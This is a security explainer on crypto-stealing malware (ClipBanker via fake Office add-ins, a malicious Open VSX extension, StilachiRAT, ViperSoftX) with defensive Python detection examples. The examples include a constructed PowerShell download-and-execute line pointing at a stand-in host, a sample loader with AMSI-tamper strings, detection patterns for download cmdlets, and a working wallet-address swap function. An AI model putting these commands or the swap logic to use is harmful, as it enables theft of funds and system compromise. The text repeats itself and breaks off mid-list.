Attackers use malicious Microsoft Office add-ins and fake extensions to steal cryptocurrency through address spoofing and hidden miners

Attackers plant crypto-address-spoofing malware in fake Microsoft Office add-in packages

In early April 2025, the cybersecurity company Kaspersky reported a new wave of attacks on cryptocurrency users. The attackers distributed malware inside fake add-in packages for Microsoft Office, hosted on the popular SourceForge platform [3].

The gist of the attack: how the malicious scheme works

The malware, a member of the ClipBanker family, was disguised as legitimate Office add-ins. It was distributed from a fake SourceForge project page that mimicked an official Office add-in developer site, offered download buttons, and could surface in search results like an ordinary Office utility [5].

The “officepackage” project did contain working Office add-ins, which built the victims’ trust. It also installed a malicious script that:

  • Replaces a cryptocurrency address copied to the clipboard with an attacker-controlled address (ClipBanker’s core function).
  • Scans the system for signs of a previous installation or of antivirus software, and removes itself if either is found.
  • Sends details about the infected device (IP address, country, username, etc.) to the attackers via Telegram.
  • Receives further commands from the attackers over remote access, using “non-traditional” methods of persisting on the system [3].

Tell-tale signs of the fake packages

Kaspersky experts noted alarming details:

  • Some installer files were suspiciously small, which is atypical for Office software even when archived.
  • Others, conversely, were padded with junk data to look like a full-size installer and reassure the user that the download was safe [3].
  • The fake installers had Russian-language interfaces, and according to Kaspersky the target audience was Russian-speaking users. Telemetry showed that 90% of potential victims were in Russia, and from January to March 2025 alone 4,604 people encountered the scheme [4].


Possible consequences of infection

  • The wallet address the victim copied is replaced with the attacker’s, so the funds, especially in a one-off or large transfer, can be lost irretrievably with no way to recover them.
  • Through the malware, the attackers gain access to the infected system and can mount further attacks, including selling that access to more dangerous criminal groups [3].
  • The package also included a cryptocurrency miner that consumes the infected computer’s resources, causing high load and slowdowns.

Recommendations for protection

Kaspersky strongly recommends downloading software only from trusted, official sources. Pirated or alternative downloaders carry particularly high risk: attackers often pass malware off as legitimate software, complete with plausible websites and installers [3]. The widespread habit of downloading from untrusted sources keeps producing new and increasingly sophisticated infection schemes, and fraudsters keep refining their disguises.

Mobile threats on the rise

At the same time, other companies report a rise in attacks on cryptocurrency users via Android malware. For example, a ThreatFabric report dated March 28, 2025 describes the Crocodilus malware, which draws fake overlays on top of legitimate apps to trick users into revealing their wallet seed phrases and to gain full control of the device [8]. This lets the fraudsters empty accounts completely; the malware is installed by downloading apps from unofficial stores and third-party sites.

These incidents once again confirm that the basis of digital security is using only official software sources, paying attention to installation details, and verifying the destination address before any cryptocurrency transfer. The new wave of malware is no accident: it is the attackers’ natural response to the growing popularity of crypto transactions and their constant search for loopholes in user habits [8].

Below is an overview of malware that poses as add-ons or extensions for Microsoft Office, IDEs, and other platforms with the goal of stealing cryptocurrency through address spoofing and other forms of data compromise:

1. Malicious extensions for Microsoft Office and SourceForge

  • Crypto-Stealing Malware in SourceForge: A Cautionary Tale for Cybersecurity Investors
    Kaspersky detected malware distributed through SourceForge as fake Office add-ins. The package dropped ClipBanker to hijack crypto addresses, sent data to the attackers via Telegram, and allowed access to the system to be sold to third parties. Notably, 90% of the victims were in Russia, and distribution relied on downloads from unverified sources [5].

2. Malicious extensions and plugins in open-source ecosystems

  • How extensions from Open VSX were used to steal cryptocurrency
    A Kaspersky article explains how malicious extensions in the Open VSX registry (such as “Solidity Language” for Cursor AI) stole crypto wallet seed phrases from blockchain developers, with losses of hundreds of thousands of dollars. The extension fetched a PowerShell script, installed remote administration tools, and enabled the theft of assets [6].

3. Current Trojans for substituting crypto addresses

  • StilachiRAT analysis: From system reconnaissance to cryptocurrency theft
    Microsoft analyzes StilachiRAT, a remote access trojan that monitors the clipboard, extracts crypto addresses and passwords, and sends them to the attackers. The malware has been observed since late 2024; its main targets are users of browsers and cryptocurrency wallet extensions, and the attacks are especially common in Asian countries [8].
  • ClipBanker threat description
    A detailed description of ClipBanker, a Trojan family focused on replacing addresses in the clipboard and stealing banking and crypto data. It is actively used by attackers and has learned to bypass antivirus, disable protection and persist on the system [10][11].

4. ClipBanker and other methods of intercepting the clipboard

  • How Clipboard Hijacking Malware Can Steal Your Crypto
    An expert publication on how clipboard-monitoring malware replaces crypto addresses with the attackers’ own. It describes how to recognise such attacks and gives key protection and prevention recommendations for all cryptocurrency holders, not just business users [12][13][14][15].

5. New malware in 2025 against crypto users

  • ViperSoftX Stealing Cryptocurrencies — ASEC
    Recent research on the ViperSoftX malware, which steals cryptocurrency by executing commands from its command-and-control server, infecting the system and harvesting users’ confidential data [16][17][18].

General conclusions and trends:

  • The number of attacks disguised as legitimate add-ons for office and professional programs is growing.
  • The most common vector of compromise is the substitution of a crypto address in the clipboard via ClipBanker and similar programs.
  • Basic protection tips: choose software download sources carefully, keep antivirus software updated, and double-check the destination address before any transfer [12].

Cybersecurity company Kaspersky has identified a dangerous campaign of malware disguised as Microsoft Office add-ins and distributed through SourceForge, a popular platform for hosting software projects. The campaign poses a serious threat to users, especially in Russia, where more than 4,600 people have encountered it since the beginning of 2025.

The malware has two key components: a cryptocurrency miner and the ClipBanker Trojan. ClipBanker steals cryptocurrency by replacing the wallet address a user copies with one belonging to the attackers: whenever a wallet address is copied, the infected computer silently swaps in the attacker’s address, the transaction goes to the wrong recipient, and the funds are lost irretrievably.

Distribution relies on fake SourceForge pages that imitate real Microsoft Office applications and offer a free download. In reality, once the password-protected archive is downloaded and unpacked, the miner and ClipBanker are delivered to the system, while Microsoft Office itself is absent from the downloaded files. This misleads users into believing the software they received is legitimate.

ClipBanker also sends information about the infected device (IP address, country and username) to the attackers via Telegram, and checks the system for antivirus software; if any is found, it can self-destruct to hide traces of the infection. Besides stealing cryptocurrency directly and using the victim’s computing power for mining, the attackers can sell access to infected computers to third parties, which widens the threat.

Notably, 90% of potential victims are located in Russia, and users who look for free or pirated software are at especially high risk of infection. Kaspersky experts strongly recommend downloading software only from official, trusted sources, since downloading from unofficial resources significantly increases the likelihood of encountering such attacks.

The discovery of the ClipBanker campaign on SourceForge is therefore an important warning to the entire software and cryptocurrency community. It highlights the need for discipline in digital security and the use of official download channels to avoid theft of funds and compromise of personal data.

This case exemplifies modern fraud methods, in which malware not only hides behind the guise of legitimate software but also uses advanced techniques to stay hidden and control devices, which requires users and organizations to raise their level of cybersecurity awareness and vigilance [10].

Cybersecurity in Open-Source Ecosystems: How Malicious Open VSX Extensions Steal Cryptocurrency

In June 2025, Kaspersky Lab specialists uncovered a major cyberattack campaign in which attackers used malicious extensions from the Open VSX repository to steal crypto assets from blockchain developers. The main victim was a company developing smart contracts in the Solidity language, which lost about $500,000.

Attack mechanism and features of the malicious extension

The attackers distributed a fake extension called “Solidity Language,” which was supposedly designed for the Cursor AI development environment, an AI-enabled tool based on Visual Studio Code. The extension was positioned as an assistant for optimizing and highlighting code syntax in the Solidity language, which is widely used to create smart contracts on the blockchain.

In fact, the extension did not perform its stated functions; it was a Trojan. After installation it launched a PowerShell script that:

  • downloaded and launched the ScreenConnect remote administration tool;
  • gave the attackers a channel to deploy additional malicious components, in particular the Quasar backdoor and a stealer that collects confidential data from browsers, email clients and crypto wallets;
  • yielded the data that let the criminals obtain the owner’s crypto wallet seed phrases and withdraw the funds.
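The chain above (IDE extension spawns PowerShell, PowerShell fetches a remote-administration installer, the installer runs from a user-writable directory) is what an endpoint detection rule should key on. The following is an added example of that detection logic run over constructed process-creation records; it is not code from the Kaspersky report. The event layout (parent, image, cmdline), the rule names, the indicator lists and the example.invalid URL are all assumptions made for illustration.

```python
"""Detection over constructed endpoint telemetry for the chain described above:
an IDE (Cursor / VS Code) spawning PowerShell that downloads and runs a
remote-administration installer.

Added example, not from the Kaspersky report. The event records are
constructed; their field layout (parent, image, cmdline) loosely follows
Sysmon process-creation events and is an assumption, as are the rule
thresholds and indicator lists.
"""
import ntpath
import re

IDE_PARENTS = {"cursor.exe", "code.exe", "code - insiders.exe"}
POWERSHELL = {"powershell.exe", "pwsh.exe"}

# Command-line traits of a download-and-execute loader (assumed list).
PS_SUSPICIOUS = re.compile(
    r"""(?ix)
      -w(?:indowstyle)?\s+hidden
    | -(?:ep|executionpolicy)\s+bypass
    | -e(?:nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{20,}
    | \b(?:iwr|invoke-webrequest|downloadstring|downloadfile|iex|invoke-expression|start-bitstransfer)\b
    """
)
# Remote-admin tools seen dropped by such loaders (assumed list).
RMM_NAMES = re.compile(r"(?i)screenconnect|connectwise|anydesk|atera")
USER_WRITABLE = re.compile(r"(?i)\\(?:Temp|AppData|Downloads|ProgramData|Users\\Public)\\")

# Constructed sample telemetry: one loader chain plus benign noise.
SAMPLE_EVENTS = [
    {"parent": r"C:\Users\dev\AppData\Local\Programs\cursor\Cursor.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r'powershell.exe -w hidden -ep bypass -c "iwr https://example.invalid/sc.exe -OutFile $env:TEMP\sc.exe; & $env:TEMP\sc.exe"'},
    {"parent": r"C:\Users\dev\AppData\Local\Programs\cursor\Cursor.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r'powershell.exe -NoProfile -c "Get-Content .\package.json"'},
    {"parent": r"C:\Users\dev\AppData\Local\Temp\sc.exe",
     "image": r"C:\Users\dev\AppData\Local\Temp\ScreenConnect.ClientSetup.exe",
     "cmdline": "ScreenConnect.ClientSetup.exe /silent"},
    {"parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\notepad.exe",
     "cmdline": "notepad.exe README.md"},
]


def _base(path: str) -> str:
    # ntpath handles Windows separators regardless of the host OS
    return ntpath.basename(path).lower()


def evaluate(event: dict) -> list:
    """Return the names of the rules this single event trips."""
    hits = []
    parent, image = _base(event["parent"]), _base(event["image"])
    if parent in IDE_PARENTS and image in POWERSHELL and PS_SUSPICIOUS.search(event["cmdline"]):
        hits.append("ide_spawns_downloader_powershell")
    if RMM_NAMES.search(image) and USER_WRITABLE.search(event["image"]):
        hits.append("rmm_installer_from_user_writable_path")
    return hits


def triage(events: list) -> dict:
    """Map event index -> rule hits, for events that tripped at least one rule."""
    return {i: hits for i, ev in enumerate(events) if (hits := evaluate(ev))}


if __name__ == "__main__":
    for i, hits in triage(SAMPLE_EVENTS).items():
        print(i, SAMPLE_EVENTS[i]["image"], hits)
```

The second record (the same IDE running a harmless `Get-Content`) shows why the parent-child pair alone is too noisy: extensions legitimately run PowerShell, so the rule also requires download, hidden-window, encoded-command or execution-policy-bypass traits on the command line, and the RMM rule is scoped to installers launched from user-writable paths rather than from Program Files.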

Scale and methods of distribution

The extension was hosted on Open VSX, the registry Cursor AI uses to install open-source extensions. Because of the registry’s ranking, it appeared at the top of search results for the query “solidity,” ahead of the legitimate extension of the same name. As a result the fake version was downloaded at least 54,000 times, greatly increasing the number of potential victims.

The extension’s download count and rating were also found to have been artificially inflated to increase its visibility and user trust.

Technical analysis and consequences for victims

The investigation showed that the affected developer’s operating system had been installed recently and carried a minimal set of software, which may have contributed to the attack’s success. A free antivirus was in use, but without a comprehensive security solution the malicious code got in quietly and stayed undetected.

Through the backdoor, the attackers controlled the infected computer, which gave them the opportunity not only to steal cryptocurrency, but also to gain access to other confidential information.

Protection Recommendations and Lessons for the Community

Kaspersky experts emphasize that even experienced developers can become victims of such attacks, especially when working with cryptocurrencies. To reduce the risks, it is recommended:

  • Download extensions only from verified and trusted sources;
  • Check the reputation and origin of extensions, pay attention to the number of downloads and reviews;
  • Use full-fledged security solutions that can detect and block malicious code;
  • Be alert to suspicious requests and security warnings;
  • Regularly update software and antivirus databases.

Results

The case of the malicious “Solidity Language” extension for Cursor AI highlights the risks of installing extensions from public open-source registries without scrutiny. Kaspersky Lab St. Petersburg calls on the developer community and technology users to be more careful and disciplined in downloading and checking software components, especially when working with cryptocurrencies and sensitive digital information.

This event also demonstrates that attackers actively combine social engineering, manipulation of ranking algorithms and remote-control tooling to maximize the effectiveness of their attacks and extract large sums from unsuspecting victims.

All facts presented are based on Kaspersky Lab’s research and report published in July 2025.

Trojans that specialize in spoofing cryptocurrency addresses remain one of the most dangerous threats to digital asset users in 2024-2025. Among them, StilachiRAT and the ClipBanker family stand out, attracting the attention of researchers and cybersecurity companies for their sophistication and effectiveness.

StilachiRAT: From System Intelligence to Cryptocurrency Theft

Since late 2024, Microsoft and other security researchers have been tracking StilachiRAT, a capable Trojan that targets browser users and cryptocurrency wallet extensions, especially in Asian countries. It focuses on the clipboard, through which copied wallet addresses and passwords pass: it monitors that data, extracts addresses and passwords, and sends them to the attackers, who then drain the victims’ wallets.

Key features of StilachiRAT:

  • Monitors the clipboard and extracts crypto addresses and passwords.
  • Targets browsers and the extensions used to manage cryptocurrencies.
  • Attacks are concentrated in Asian countries, indicating the campaign’s focus.
  • Collects data covertly, without the user noticing.

ClipBanker: A Trojan Family with a Wide Arsenal of Functions

ClipBanker is another well-known malware family that focuses on replacing clipboard addresses and stealing financial data, including bank details and cryptocurrency wallets. This malware has been successfully used by attackers to conduct targeted attacks on a wide range of users.

ClipBanker Features:

  • Substitution of copied crypto wallet addresses with addresses controlled by attackers, which leads to irretrievable loss of funds during transfer.
  • The ability to bypass antivirus programs, disable defense mechanisms and reliably gain a foothold in the system, which complicates detection and removal.
  • Using various methods of covert implementation and control, including sending data to attackers and remote control of infected devices.
  • Distribution through fake extensions, phishing sites and pirated software.

The importance of threats and recommendations for protection

The activity of the StilachiRAT and ClipBanker Trojans highlights the need for increased attention to security when using crypto wallets and related applications. Risks can be significantly reduced by following these recommendations:

  • Use only official and trusted sources to download software and extensions.
  • Carefully check the copied crypto addresses before sending funds, confirming their correctness.
  • Update antivirus software and security systems to detect new threats in a timely manner.
  • Avoid using pirated software and suspicious downloaders.
  • If you detect suspicious activity on your device, take immediate steps to clean it and restore security.

Thus, StilachiRAT and ClipBanker represent modern, technically advanced threats to cryptocurrency users worldwide. Their effectiveness rests on social engineering, technical tricks and weaknesses in users’ transaction habits. The high level of risk calls for a comprehensive approach to protection and for constantly raising the awareness of users and organizations about such threats.

ClipBanker malware and methods for intercepting crypto addresses in the clipboard: analysis of an expert publication

In recent years, there has been an increase in the activity of malware specifically designed to attack users of cryptocurrency wallets. One of the most notable and dangerous families of such programs is ClipBanker, a Trojan that organizes the interception and substitution of crypto wallet addresses copied to the clipboard in order to steal funds. Expert publications describe in detail the operating principle of these malicious programs and provide recommendations for their detection and prevention.

How ClipBanker and other clipboard interception malware work

ClipBanker disguises itself as legitimate software and gets onto a user’s computer when the user downloads fake or pirated versions of popular programs, such as “Microsoft Office” from the SourceForge platform. Once installed, ClipBanker monitors the operating system’s clipboard in the background, the place where the user temporarily copies data, including crypto wallet addresses.

When a victim copies a wallet address — a standard practice, as manually entering addresses is prone to errors — ClipBanker quietly replaces the copied address string with the attacker’s address. As a result, the user transfers funds to the scammers without suspecting the substitution.

In addition to ClipBanker, other Trojans use the same clipboard interception mechanism, often combined with remote control, hidden cryptocurrency mining and theft of confidential data. Such malware can check the system for antivirus software and disable protection, or delete itself if it is detected, to avoid analysis.

Methods for Recognizing Clipboard Hijacking Attacks

It is extremely important for cryptocurrency users to be able to recognize possible attacks:

  • Suspicious programs and installations: Often, malicious extensions or software come from unverified, pirated sources or under the guise of free versions of well-known products.
  • Unusual clipboard behavior: if the address that gets pasted differs from the one that was copied, or any discrepancy is noticed, that is a signal of possible substitution.
  • Increased system activity: Infection may be accompanied by a slowdown in computer operation due to hidden mining.
  • Detection in antiviruses: Modern antivirus solutions can detect the presence of Trojans with the function of intercepting the clipboard.

Recommendations for protection and prevention

To prevent theft of funds and ensure security, it is important to follow these guidelines:

  • Use only official and trusted sources to download software and extensions. Downloading from pirated sites or unknown resources significantly increases the risk of infection.
  • Carefully check wallet addresses before transferring, especially when copying and pasting. It is recommended to check addresses visually and use confirmation functions in crypto wallets as much as possible.
  • Regularly update your operating system and antivirus software. Modern antiviruses are capable of blocking many types of Trojans, including ClipBanker.
  • Use hardware wallets whenever possible, which reduce the risk of funds being compromised through computer infection.
  • Pay attention to unusual device behavior, performance drops, or pop-up errors that may indicate hidden malware activity.

Malicious programs that use the method of substituting crypto addresses in the clipboard represent one of the most sophisticated and effective threats to the security of digital assets. ClipBanker and its analogues combine data interception, hidden mining, bypassing antivirus protection and remote control, which makes them especially dangerous.

User awareness and the use of comprehensive security measures are the main barriers to attackers. Experts strongly recommend not to neglect digital hygiene – download software only from official sources, carefully check crypto addresses and promptly update protection.

These measures will help to significantly reduce the risk of becoming a victim of the clipboard hijacking attacks that are common today and keep your crypto assets safe.

How ClipBanker Intercepts the Clipboard and Replaces Crypto Addresses: the Facts

ClipBanker hijacks the clipboard and replaces cryptocurrency addresses through the following mechanism, according to cybersecurity reports:

  • ClipBanker often enters a system via fake or pirated Microsoft Office add-ins hosted on sites like SourceForge. Once installed, it runs in the background, silently monitoring the contents of the operating system’s clipboard, the area of memory into which the user copies data.
  • When the user copies a cryptocurrency address (common practice when transferring funds, since addresses are long and hard to type by hand), ClipBanker matches the clipboard contents against “regular expressions”: patterns that recognise wallet address formats, such as Bitcoin addresses in the bc1 format and others [2].
  • Once ClipBanker detects a cryptocurrency address in the clipboard, it silently replaces the copied string with an attacker address from a pre-prepared list. When the user pastes the address into the payment form, the funds go to the scammers instead of the intended recipient [2].
  • Besides spoofing addresses, ClipBanker collects information about the infected system (IP address, country, username, etc.) and sends it to the attackers via Telegram, which helps them keep track of ongoing infections [1].
  • ClipBanker can also scan the system for antivirus software or signs of a previous installation, and can remove itself to avoid detection [1].
  • The infection is typically spread through fake projects and websites posing as legitimate services, which misleads users and lends the malware credibility [1].

Thus, ClipBanker implements clipboard interception at the operating-system level: it watches for clipboard changes, tests the contents against address patterns and substitutes its own addresses, which makes it a very effective cryptocurrency-theft scheme. Defending against it requires using official sources for software, keeping antivirus software updated, and carefully checking every address that is typed or pasted.
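The clipboard substitution described above, and the paste-time check recommended earlier on this page (compare what was copied with what got pasted), as an added example in Python; this is not ClipBanker’s own code. The address regexes are an assumed subset of what a clipper would carry (legacy Base58 and bech32 Bitcoin, plus Ethereum); the sample clipboard text is constructed, and the “attacker” address is the public example address from the Bitcoin wiki, used only so that the checksum check has two valid addresses to compare.

```python
"""Clipper simulation and paste-time verification.

Added example, not ClipBanker's own code. The address regexes, the sample
clipboard text and the "attacker" address list are constructed for
illustration; the attacker address is a well-known public example address.
"""
import hashlib
import re

# Patterns a clipper keys on (assumed set). A real clipper carries many more chains.
ADDRESS_PATTERNS = {
    "btc_legacy": re.compile(r"\b[13][a-km-zA-HJ-NP-Z1-9]{25,34}\b"),
    "btc_bech32": re.compile(r"\bbc1[ac-hj-np-z02-9]{6,87}\b"),
    "eth": re.compile(r"\b0x[0-9a-fA-F]{40}\b"),
}

_B58 = "123456789ABCDEFGHJKLMNPQRSTUVWXYZabcdefghijkmnopqrstuvwxyz"


def base58check_valid(addr: str) -> bool:
    """Base58Check: 1 version byte + 20-byte hash + 4-byte double-SHA256 checksum."""
    n = 0
    for ch in addr:
        idx = _B58.find(ch)
        if idx < 0:
            return False
        n = n * 58 + idx
    body = n.to_bytes((n.bit_length() + 7) // 8, "big")
    leading = len(addr) - len(addr.lstrip("1"))  # each leading '1' encodes a 0x00 byte
    data = b"\x00" * leading + body
    if len(data) != 25:
        return False
    digest = hashlib.sha256(hashlib.sha256(data[:21]).digest()).digest()
    return digest[:4] == data[21:]


def classify(text: str) -> list:
    """Return [(kind, address), ...] for every address-like token in text."""
    found = []
    for kind, pat in ADDRESS_PATTERNS.items():
        found.extend((kind, m.group(0)) for m in pat.finditer(text))
    return found


def simulate_clipper(clipboard: str, attacker: dict) -> str:
    """What the malware does on every clipboard change: swap each recognised
    address for the attacker's address of the same kind, leaving the rest of
    the text untouched so nothing looks odd to the user."""
    out = clipboard
    for kind, pat in ADDRESS_PATTERNS.items():
        if kind in attacker:
            out = pat.sub(attacker[kind], out)
    return out


def verify_paste(intended: str, pasted: str) -> str:
    """Defensive check to run right before sending: compare the address you
    meant to use with what actually landed in the payment form."""
    if pasted == intended:
        return "ok"
    if {k for k, _ in classify(intended)} & {k for k, _ in classify(pasted)}:
        return "swapped"  # same address type, different value: clipper signature
    return "mismatch"


def demo() -> dict:
    # Constructed sample: the user copies the genesis-block address; the
    # "attacker" address is the Bitcoin wiki's public worked-example address.
    clipboard = "Send 0.5 BTC to 1A1zP1eP5QGefi2DMPTfTL5SLmv7DivfNa"
    attacker = {"btc_legacy": "1PMycacnJaSqwwJqjawXBErnLsZ7RkXUAs"}
    intended = classify(clipboard)[0][1]
    hijacked = simulate_clipper(clipboard, attacker)
    pasted = classify(hijacked)[0][1]
    return {
        "pasted": pasted,
        # both addresses carry a valid checksum, so checksum validation alone
        # cannot reveal the swap; only comparison with the intended address can
        "intended_valid": base58check_valid(intended),
        "pasted_valid": base58check_valid(pasted),
        "verdict": verify_paste(intended, pasted),
    }


if __name__ == "__main__":
    print(demo())
```

The point of `base58check_valid` is negative: a wallet’s own checksum validation will happily accept the attacker’s address, because it is a well-formed address too. The only check that catches a clipper is comparing the pasted string against the address obtained out-of-band (from the recipient, a hardware wallet screen or an address book), which is what `verify_paste` models; in practice, compare at least the first and last several characters by eye before confirming.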

Why ClipBanker Malware Is Particularly Effective at Copying Cryptocurrency Addresses

ClipBanker is particularly effective at hijacking crypto addresses for the following reasons:

  • It works directly on the clipboard, the memory area into which users routinely copy cryptocurrency addresses to avoid typing errors, so the attack rides on a normal workflow and is practically invisible.
  • Using patterns (regular expressions) to recognise cryptocurrency addresses in the clipboard, it quickly and accurately identifies exactly the data it needs to substitute.
  • The copied address is replaced instantly and without any visible sign to the user, which makes the substitution unlikely to be noticed.
  • ClipBanker can operate “filelessly”, leaving few of the usual traces on disk and avoiding the triggers that common security tools and antiviruses rely on, which makes it even less noticeable.
  • By attacking the copy-and-paste step, ClipBanker exploits a standard, widespread habit among cryptocurrency users, which raises the attack’s success rate.

Thus, ClipBanker’s high effectiveness comes from its focus on the clipboard, accurate recognition of cryptocurrency addresses, and a stealthy method that is hard to track and prevent with standard antiviruses [1].

In 2025, the threat from sophisticated, technically advanced malware targeting cryptocurrency users continues to grow. One such threat is ViperSoftX, which ranks among the most serious dangers to digital asset security. Research by AhnLab Security Intelligence Center (ASEC) and other analysts confirms that ViperSoftX steals cryptocurrency by executing commands from its command-and-control (C&C) server, infecting the system and taking control of users’ sensitive information.

What is ViperSoftX?

ViperSoftX is a multifunctional remote access trojan (RAT), known since 2020, that has evolved into capable data-stealing malware targeting cryptographic keys and wallet access. In 2025, researchers recorded a new, more robust version equipped with sophisticated stealth and anti-detection mechanisms. This version implements a well-thought-out life cycle, from initialization through to interaction with the command-and-control (C2) server, which gives the operators effective control of infected devices.

ViperSoftX Attack Mechanisms

  • Command and control: Once infected, the device connects to the C2 server, from which it receives commands to download additional modules, collect data, and carry out cryptocurrency theft.
  • Control and data theft: ViperSoftX is capable of stealing data from browsers, cryptocurrency wallets, password managers and other applications, including confidential keys and seed phrases needed to access crypto assets.
  • Stealth and Resistance to Removal: The new version of the malware uses advanced camouflage techniques, increases the delay before launch (up to 300 seconds) and uses unique identifiers to prevent repeated launches, which complicates detection and analysis.
  • Expanded functionality: The malware downloads modules that can capture the screen, log keystrokes, and perform other types of user surveillance, allowing attackers to take full control of the system.

Trends and implications

  • There is a growing number of attacks disguised as legitimate add-ons and extensions for office and professional applications, which mislead users and make it easier to get infected.
  • The most common vector of compromise remains the technology of substituting crypto addresses in the clipboard, similar to the actions of the ClipBanker Trojans and its analogues, which leads to direct financial losses.
  • A hardened command-and-control server and sophisticated antivirus-evasion mechanisms make ViperSoftX one of the most dangerous threats in the crypto space today.

Recommendations for protection

  • Download software only from trusted sources: installing programs and extensions from official sites significantly reduces the risk of infection.
  • Regularly update antivirus and security software capable of detecting and neutralizing modern threats.
  • Carefully check every crypto address before transferring, especially if it was copied and pasted from the clipboard.
  • Use hardware wallets to store crypto assets, which reduces the likelihood of compromise by malware.
  • Periodically audit and monitor system activity to identify suspicious processes and respond to threats promptly.

Conclusion

Research and analytics in 2025 show that cybercriminals are becoming increasingly sophisticated in their use of malware such as ViperSoftX to steal users’ crypto assets. This malware provides complete control over victims’ devices and has significant stealth capabilities, making it particularly dangerous. The simultaneous increase in crypto address spoofing attacks via ClipBanker and similar Trojans confirms that the security of crypto users directly depends on discipline in choosing software sources, being careful in financial transactions, and regularly updating security tools.

Following these recommendations and improving digital hygiene remain key measures to counter the new wave of threats in the world of cryptocurrencies.

Sources: AhnLab Security Intelligence Center (ASEC) reports, Trend Micro and SecurityLab research, Avast and Kaspersky publications on ViperSoftX and modern cryptocurrency-theft Trojans [7].

How ViperSoftX is mutating and becoming more stealthy and resistant to removal

ViperSoftX malware in 2025 shows significant evolution, becoming increasingly stealthy and resistant to removal due to a number of technical improvements and new implementation methods identified by cybersecurity experts:

  • Long, hidden wait before activation: In the new version of ViperSoftX, the infected computer waits up to 300 seconds (5 minutes) before starting the active phase of the attack. This lets the malware outlast behavioral analysis systems and sandboxes that only observe a program during the first seconds after launch [1].
  • Unique GUIDs instead of static mutexes: To prevent multiple copies from running at once and to resist reinfection, ViperSoftX uses dynamically generated identifiers (GUIDs), which complicates signature-based detection and analysis [1].
  • Integration with the .NET Common Language Runtime (CLR) and AutoIt: ViperSoftX executes its malicious code in a PowerShell environment embedded inside AutoIt and managed by the CLR. This architecture lets it run complex malicious functions, bypass system protection and hide from antivirus tools, while evading standard PowerShell scanning [2].
  • Advanced anti-analysis and security bypass: The malware is capable of modifying anti-malware scanning interfaces (for example AMSI, the Antimalware Scan Interface) to hide its activity, and of blocking communication with browsers, which hampers monitoring and response [2].
  • Multi-phase launch and infection: Infection begins with malicious payloads hidden in lures (e.g. e-books) that, when opened, unpack a sophisticated scripting engine including PowerShell and AutoIt, making detection and removal difficult [2].
  • Modularity and dynamic management: The ViperSoftX architecture has become more flexible, allowing additional command-and-control modules to be loaded, functionality to be extended, and the payload to be adapted to the attackers’ specific goals [1].
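The traits listed above (a long pre-activation sleep, a GUID-named mutex, AMSI-related tampering, CLR/AutoIt staging, remote fetch-and-eval) are exactly what a static triage rule for PowerShell loaders can score. The following is an added example of such a scorer; it is not ViperSoftX code and the two script samples are constructed. The indicator regexes, their weights, the 120-second sleep threshold and the score cut-off are all assumptions chosen for illustration. The loader sample contains only string references to AMSI internals, not a working bypass.

```python
"""Static triage of a PowerShell loader for the evasion traits listed above
(long pre-activation sleep, GUID-named mutex, AMSI tampering strings,
CLR/AutoIt staging, remote fetch-and-eval).

Added example, not ViperSoftX code. Both script samples are constructed, and
the indicator regexes, weights and the 120-second sleep threshold are
assumptions chosen for illustration.
"""
import re

# name -> (pattern, weight). Weights are assumed.
INDICATORS = {
    "remote_fetch": (re.compile(r"(?i)DownloadString|DownloadFile|Invoke-WebRequest|\biwr\b"), 2),
    "invoke_expression": (re.compile(r"(?i)\b(?:iex|Invoke-Expression)\b"), 1),
    "amsi_tamper": (re.compile(r"(?i)AmsiUtils|amsiInitFailed|AmsiScanBuffer|amsi\.dll"), 3),
    "guid_mutex": (re.compile(r"(?i)Threading\.Mutex[^\n]*NewGuid|NewGuid[^\n]*Threading\.Mutex"), 1),
    "clr_autoit": (re.compile(r"(?i)AutoIt|Reflection\.Assembly\]::Load|Add-Type"), 1),
}
SLEEP = re.compile(r"(?i)Start-Sleep\s+(?:-s(?:econds)?\s+)?(\d+)")
SLEEP_THRESHOLD_SECONDS = 120  # assumed: longer than a typical sandbox run window
SUSPICIOUS_SCORE = 5           # assumed cut-off

# Constructed loader exhibiting the traits (string references to AMSI
# internals only; this is a detection sample, not a working bypass).
LOADER = r"""
$c = New-Object Net.WebClient
$p = $c.DownloadString('https://example.invalid/stage2.txt')
Start-Sleep -Seconds 300
$t = 'System.Management.Automation.AmsiUtils'
$f = 'amsiInitFailed'
$m = New-Object System.Threading.Mutex($false, [guid]::NewGuid().ToString())
IEX $p
"""

# Constructed benign admin script sharing one low-weight trait (Add-Type).
ADMIN = r"""
Get-ChildItem C:\Logs -Filter *.log | Where-Object Length -gt 1MB | Remove-Item
Start-Sleep -Seconds 5
Add-Type -AssemblyName System.Windows.Forms
[System.Windows.Forms.MessageBox]::Show('Log cleanup done')
"""


def score(script: str) -> dict:
    """Return {indicator: weight} for every indicator present in the script."""
    hits = {name: w for name, (pat, w) in INDICATORS.items() if pat.search(script)}
    # the longest Start-Sleep in the script, 0 if none (seconds only; -Milliseconds is ignored)
    longest = max((int(m.group(1)) for m in SLEEP.finditer(script)), default=0)
    if longest >= SLEEP_THRESHOLD_SECONDS:
        hits["long_sleep"] = 2
    return hits


def verdict(script: str) -> str:
    """Sum the weights of the tripped indicators and compare with the cut-off."""
    return "suspicious" if sum(score(script).values()) >= SUSPICIOUS_SCORE else "clean"


if __name__ == "__main__":
    for name, s in (("loader", LOADER), ("admin", ADMIN)):
        print(name, verdict(s), score(s))
```

Scoring rather than alerting on any single indicator matters here: `Add-Type` and a short `Start-Sleep` appear in ordinary administration scripts, and the admin sample scores 1 and stays clean, while the loader trips five indicators for a total of 9. A long sleep on its own is also worth surfacing to the sandbox team, since it is precisely the trait that defeats a fixed short observation window.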

These changes make ViperSoftX especially dangerous – it is not only effective in stealing cryptocurrencies and sensitive data, but also extremely resistant to traditional detection and removal methods. Modern protections are often powerless without comprehensive behavior analysis and relevant heuristics.

Sources confirm that in 2025, ViperSoftX remains an example of sophisticated, dynamic and highly stealthy malware that deploys innovative techniques to evade cyber defenses and maintain control over infected systems [2].

Why are upgraded versions of ViperSoftX harder to detect and remove?

The upgraded versions of the ViperSoftX malware are more difficult to detect and remove thanks to a number of new technical improvements and stealth techniques:

  • The malware delays the activation of its malicious functions for up to 300 seconds, which allows it to bypass behavioral analysis systems and sandboxes that typically monitor program actions only immediately after launch.
  • It uses unique dynamic identifiers instead of static ones, making it harder to detect and block repeat launches.
